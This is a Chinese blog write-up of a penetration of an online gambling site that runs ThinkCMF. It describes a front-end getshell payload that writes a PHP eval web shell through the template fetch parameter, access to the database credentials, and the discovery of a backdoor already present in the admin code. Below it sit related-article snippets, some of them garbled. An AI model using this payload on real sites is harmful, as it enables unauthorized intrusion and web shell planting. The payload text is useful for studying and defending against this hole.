渗透小计之「竟然有人在网赌平台代码里下毒」

访客3年前黑客文章670

print by 猩猩安全团队——作者:hurnme、flyingdemon

引言

记一次对某网D平台的渗透,以及发现其后台源码存在后门的过程

确定目标CMS

拿到其ip之后先信息搜集搜了了一波,确定目标使用的是ThinkCMF。

1608950324_5fe6a23450ebaf27b1806.png!small?1608950324080

进去之后在url处构造报错

1608949555_5fe69f33c999ae566e1cd.png!small?1608949555635

写入一句话

查看到ThinkPHP版本崴3.2.3,那么对应的thinkCMF版本应该存在前台getshell的洞。废话不多说,直接构造payload一发入魂。

?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('shell.php','<?php @eval($_POST[" ***  *** 521"]);?>')</php>

写入shell之后连接蚁剑,直接拿下

1608949768_5fe6a008065c146cdc01d.png!small?1608949767848

鄙人在渗透的过程中一直有一个习惯,那就是无论如何都要拿到后台管理员权限,不拿后台权限就浑身不得劲,即使拿下了主机,也是吃嘛嘛不香。没拿到后台就拿下主机,那和没确定关系就 *** 有什么区别!

1608950091_5fe6a14bedb97de6b3050.png!small?1608950091964

进入♂后台

一开始的思路是读取其config.php文件连接他的数据库,在拿到了数据库账号和密码的时候怎么连也连不上去,小伙伴提供了另一条思路,修改后台登录逻辑,直捣黄龙。

正在我要修改后台登录逻辑的时,浏览代码的过程中无意之中发现了一个好玩的线索。

1608950289_5fe6a211ecb71294db37e.png!small?1608950289732

这。。。这TM。。。有人在代码里下毒。

拿着不知道是哪位好心人留下的后门,含泪登录了后台。

1608950667_5fe6a38b3a8f9a6467892.png!small?1608950667016

帮这个主机免费做了一次入侵检测,没有发现我们进入之前被入侵的痕迹,盲猜可能是这个平台自带后门。


相关文章

返程复工防护路线图曝光 返程复工防护路线图是什么样的

返程复工防护路线图曝光 返程复工防护路线图是什么样的

疫情当前,返工人员如何做好防护措施?这份返程复工防护路线图说全了都听话!...

一键还原B站BV号为AV号HTML网页源码

本文是分享:一键还原B站BV号为AV号HTML网页源码 快速还原BV为AV号,现在替换BILIBILI视频网页链接中的BV号为AV号依旧可以访问。 源码为网络看到,暂不明确作者。api调用地址:htt...

成功追回wangle的输掉的钱案例wangle有转账记录能

区块链技术是金融科技(Fintech)领域的一项重要技术创新。 作为分布式记账(Distributed Ledger Technology,DLT)平台的核心技术,区块链被认为在金融、征信、物...

水滴摄像头福利破解,前端黑客软件,像电影里黑客高手一样敲代码攻击入侵网站

"background": { // 扩展在后台运转的脚本在曩昔的几年中发作了如此多的备受瞩目的黑客进犯和网络进犯,很简单堕入小企业很少成为进犯方针。 究竟,大企业能够供给更多,特别是触及个人或灵敏数...

怎么防止手机被远程控制(手机被远程控制怎么解决)

怎么防止手机被远程控制(手机被远程控制怎么解决)

本文导读目录: 1、请问华为手机被人远程控制如何解除? 2、智能手机如何防止被远程控制和跟踪? 3、2020年手机被远程控制监视过,现在怎么样才能避免被这样远程控制? 4、怎么防止小人远程...

想学黑客没有电脑只有手机(黑客需要电脑还是手机)

想学黑客没有电脑只有手机(黑客需要电脑还是手机)

没文化,没用过电脑的人,想做黑客,有客能成功吗 首先是兴趣,没有兴趣坚持不久!其次是多接触相关方面的知识。我认为黑客有两种(褒义的),一种是挑战软件加密的黑客,一种是挑战网络安全的黑客。这当然是最基本...